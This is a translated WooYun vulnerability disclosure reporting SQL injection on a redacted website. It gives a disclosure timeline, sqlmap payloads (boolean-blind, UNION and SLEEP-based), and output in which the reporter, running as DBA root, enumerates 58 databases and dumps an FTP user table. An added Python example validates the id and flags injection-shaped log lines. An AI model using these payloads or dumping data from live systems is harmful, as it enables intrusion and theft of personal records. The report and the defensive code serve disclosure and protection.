WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles, online browsing: http://drop.zone.ci/
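2015-08-25: Details reported to the vendor; awaiting vendor handling
2015-08-26: CNCERT (National Internet Emergency Center) has not yet been able to reach the organization concerned; details disclosed only to the notifying body
2015-09-05: Details disclosed to core white hats and experts in related fields
2015-09-15: Details disclosed to regular white hats
2015-09-25: Details disclosed to intern white hats
2015-10-10: Details disclosed to the public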
**.**.**.**/index.php/Information/detail/id/232*.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://**.**.**.**:80/index.php/Information/detail/id/232) AND 3632=3632 AND (6265=6265.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: http://**.**.**.**:80/index.php/Information/detail/id/-1506) UNION ALL SELECT NULL,CONCAT(0x7165756b71,0x444e4f43704a46615465,0x71656b7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://**.**.**.**:80/index.php/Information/detail/id/232) AND SLEEP(5) AND (4657=4657.html?PHPSESSID=a24bd821bddd1ef845db868446b14e71
---
[22:01:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.6
back-end DBMS: MySQL 5.0.11
OK, the injection works; let's dump everything that can be dumped.
database management system users privileges:
[22:03:38] [INFO] fetching current user
current user: 'root@localhost'
[22:03:38] [INFO] fetching current database
current database: 'hyxh2015'
[22:03:39] [INFO] testing if current user is DBA
[22:03:39] [INFO] fetching current user
current user is DBA: True
database management system users password hashes:
available databases [58]:
Here there are 58 databases holding so much sensitive information, and there is even one named ftp, so I dumped it straight away.
Database: ftp
Table: user
[400 entries]
400 entries; that looks pretty impressive. OK, that's it for now.
Same as above.
You are the professionals.
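A defensive counterpart to the finding above, as an added example that is not part of the original report or the site's code: the `id` path segment of the `/index.php/Information/detail/id/<id>.html` route is accepted only if it is purely decimal digits, it reaches SQL only as a bound integer, and the same allowlist is run over access-log lines to surface requests shaped like the reported payloads. Assumptions: a Python `sqlite3`-style connection stands in for the site's PHP/MySQL stack, the table `information` and column `title` are hypothetical, and the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Route shape from the report: /index.php/Information/detail/id/<id>.html
ROUTE = re.compile(
    r"^/index\.php/Information/detail/id/(?P<id>[^?]*?)(?:\.html)?(?:\?.*)?$")
STRICT_ID = re.compile(r"[0-9]{1,9}")  # allowlist: ASCII decimal digits only
# Request field of an Apache combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[0-9.]+"')


def parse_detail_id(target):
    """Return the id as an int, or None when the request must be rejected."""
    m = ROUTE.match(target)
    raw = unquote(m.group("id")) if m else ""
    return int(raw) if STRICT_ID.fullmatch(raw) else None


def fetch_detail(conn, target):
    """Look up one record; the id reaches SQL only as a bound integer."""
    ident = parse_detail_id(target)
    if ident is None:
        return None  # caller answers 404 and never builds SQL from the segment
    # Hypothetical table/column names; '?' is the sqlite3 placeholder style.
    return conn.execute(
        "SELECT title FROM information WHERE id = ?", (ident,)).fetchone()


def flag_suspicious(log_lines):
    """Return (line number, decoded id segment) for ids failing the allowlist."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        req = REQUEST.search(line)
        m = ROUTE.match(req.group("target")) if req else None
        if m and not STRICT_ID.fullmatch(unquote(m.group("id"))):
            hits.append((n, unquote(m.group("id"))))
    return hits


# Constructed log lines (documentation addresses), not taken from the target.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Aug/2015:22:01:50 +0800] "GET /index.php/Information/detail/id/232.html HTTP/1.1" 200 5120',
    '192.0.2.66 - - [25/Aug/2015:22:01:52 +0800] "GET /index.php/Information/detail/id/232%29%20AND%203632%3D3632%20AND%20%286265%3D6265.html HTTP/1.1" 200 5120',
    '192.0.2.66 - - [25/Aug/2015:22:01:54 +0800] "GET /index.php/Information/detail/id/232%29%20AND%20SLEEP%285%29%20AND%20%284657%3D4657.html HTTP/1.1" 200 5120',
    '192.0.2.10 - - [25/Aug/2015:22:02:10 +0800] "GET /index.php/News/list.html HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in flag_suspicious(SAMPLE_LOG):
        print(hit)
```

In a PHP/MySQL application the equivalent is an integer cast or digit check on the route parameter plus a prepared statement with a bound parameter.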
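Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-08-26 20:05
CNVD confirmed and reproduced the reported vulnerability and has handed it over to CNCERT, which will coordinate follow-up handling with the organization that operates the site.
None yet.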